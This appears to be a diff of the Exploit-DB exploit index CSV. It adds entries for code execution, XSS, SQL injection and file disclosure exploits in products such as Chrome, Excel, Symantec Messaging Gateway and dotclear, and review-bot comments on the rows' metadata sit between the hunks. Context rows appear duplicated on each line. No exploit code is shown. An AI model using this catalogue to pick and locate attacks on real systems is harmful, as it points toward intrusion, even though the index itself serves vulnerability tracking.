51331,exploits/linux/local/51331.txt,"Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)",2023-04-08,"Rafay Baloch and Muhammad Samak",local,linux,,2023-04-08,2023-04-08,0,,,,,,
40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,,2016-12-19,2018-11-17,1,,,,,,https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html 40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,,2016-12-19,2018-11-17,1,,,,,,https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",2021-10-07,"Kiran Ghimire",local,linux,,2021-10-07,2021-10-07,1,CVE-2021-22557,,,,http://www.exploit-db.comslo-generator-2.0.0.tar.gz, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",2021-10-07,"Kiran Ghimire",local,linux,,2021-10-07,2021-10-07,1,CVE-2021-22557,,,,http://www.exploit-db.comslo-generator-2.0.0.tar.gz,
1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux,,2005-08-29,2016-12-19,1,OSVDB-19082;CVE-2005-2772,,,,, 1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux,,2005-08-29,2016-12-19,1,OSVDB-19082;CVE-2005-2772,,,,,
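Review bot: the author field on row 51331 holds two people in one string ("Rafay Baloch and Muhammad Samak"), which no author lookup on either name alone will match exactly, and the codes column is empty. Suggest settling on one convention for multi-author entries and recording a CVE or vendor advisory reference if one exists, since a row without any code cannot be joined against vulnerability-management data.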
@ -10293,6 +10301,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple,,2015-10-13,2015-10-13,0,CVE-2015-7805;OSVDB-128868,,,,, 38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple,,2015-10-13,2015-10-13,0,CVE-2015-7805;OSVDB-128868,,,,,
1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple,,2006-03-04,2016-06-29,1,OSVDB-23782;CVE-2005-1544;OSVDB-16350,,,,http://www.exploit-db.comtiff-3.7.1.tar.gz, 1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple,,2006-03-04,2016-06-29,1,OSVDB-23782;CVE-2005-1544;OSVDB-16350,,,,http://www.exploit-db.comtiff-3.7.1.tar.gz,
12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple,,2010-04-06,2017-11-15,1,,,,,, 12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple,,2010-04-06,2017-11-15,1,,,,,,
51333,exploits/multiple/local/51333.rb,"Lucee Scheduled Job v1.0 - Command Execution",2023-04-08,"Alexander Philiotis",local,multiple,,2023-04-08,2023-04-08,0,,,,,,
44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,,2018-02-20,2018-02-20,1,CVE-2017-6516,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/74c6e21f49bc15ebef253886c3f37ace419c6f32/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb 44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,,2018-02-20,2018-02-20,1,CVE-2017-6516,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/74c6e21f49bc15ebef253886c3f37ace419c6f32/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf
19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
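Review bot: row 51333 points at a .rb file, but its title has no "(Metasploit)" suffix and its tags column is empty, whereas the neighbouring .rb row 44150 carries both the suffix and the "Metasploit Framework (MSF)" tag. If 51333.rb is a Metasploit module, add both so the row is labelled like the rest. "Scheduled Job v1.0" also reads like a feature name rather than a Lucee release, so the affected version is worth confirming with the submitter.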
@ -10960,6 +10969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info
21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,, 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,,
40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,, 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,,
51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,,
19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info
19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950
19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple,,1998-01-01,2012-06-13,1,OSVDB-276;CVE-1999-0278,,,,,https://www.securityfocus.com/bid/149/info 19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple,,1998-01-01,2012-06-13,1,OSVDB-276;CVE-1999-0278,,,,,https://www.securityfocus.com/bid/149/info
@ -11475,6 +11485,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,, 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,,
51327,exploits/multiple/webapps/51327.txt,"Adobe Connect 11.4.5 - Local File Disclosure",2023-04-08,h4shur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-22232,,,,,
33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info 33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info
41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Request Forgery (CSRF)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt 41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Request Forgery (CSRF)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt
41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Scripting (XSS)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt 41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Scripting (XSS)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt
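Review bot: row 51327 reuses CVE-2023-22232, the identifier already on row 49550 directly above it, although the two titles describe different issues (Local File Disclosure in 11.4.5 versus Username Disclosure in 10). Confirm which issue the CVE actually covers and correct the codes column on the other row. As it stands, anyone matching on that CVE gets two unrelated entries, one of them published 2021-02-09.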
@ -11971,6 +11982,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/ 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,, 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@ -12086,11 +12098,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,, 14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,,
35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,,
51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,,
50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,, 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,,
37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info
35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,, 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,,
35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple,,2015-01-26,2015-01-26,0,CVE-2014-9226;OSVDB-117515;CVE-2014-9225;CVE-2014-9224;CVE-2014-7289;OSVDB-117359;OSVDB-117357;OSVDB-117356;OSVDB-117355,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00 35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple,,2015-01-26,2015-01-26,0,CVE-2014-9226;OSVDB-117515;CVE-2014-9225;CVE-2014-9224;CVE-2014-7289;OSVDB-117359;OSVDB-117357;OSVDB-117356;OSVDB-117355,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443,2019-07-03,2019-07-03,0,CVE-2019-9701,"Cross-Site Scripting (XSS)",,,, 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443,2019-07-03,2019-07-03,0,CVE-2019-9701,"Cross-Site Scripting (XSS)",,,,
51342,exploits/multiple/webapps/51342.txt,"Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-25630,,,,,
23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple,,2012-12-03,2012-12-03,0,CVE-2012-0308;OSVDB-84897,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00 23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple,,2012-12-03,2012-12-03,0,CVE-2012-0308;OSVDB-84897,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00
42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple,,2017-09-04,2017-09-04,1,CVE-2017-6328,,,,, 42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple,,2017-09-04,2017-09-04,1,CVE-2017-6328,,,,,
41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2015-2994,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/multi/http/sysaid_auth_file_upload.rb 41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2015-2994,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/multi/http/sysaid_auth_file_upload.rb
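Review bot: both added rows leave the tags column empty, and for 51342 (Stored Cross-Site Scripting) that differs from row 47071 two lines above, which carries the "Cross-Site Scripting (XSS)" tag. Suggest adding the matching tag to 51342 and checking whether 51340 (SQL Injection) should carry its category tag too, so that filtering by tag returns the new entries.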
@ -16965,6 +16979,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php,,2006-06-02,,1,OSVDB-25977;CVE-2006-2866,,,,, 1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php,,2006-06-02,,1,OSVDB-25977;CVE-2006-2866,,,,,
29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info 29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info
29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info 29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info
51353,exploits/php/webapps/51353.txt,"dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info 36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info
36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info 36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info
36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info 36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info
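Review bot: the product name on row 51353 is written "dotclear", while the surrounding rows use "DotClear" and "Dotclear". That makes three spellings for one product and will split results in any case-sensitive search. Suggest normalising the name to the form used by the 2.x rows below. The codes column is also empty, so a CVE or advisory reference should be added if one has been assigned.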
@ -18998,7 +19013,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51231,exploits/php/webapps/51231.txt,"GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31068,,,,,
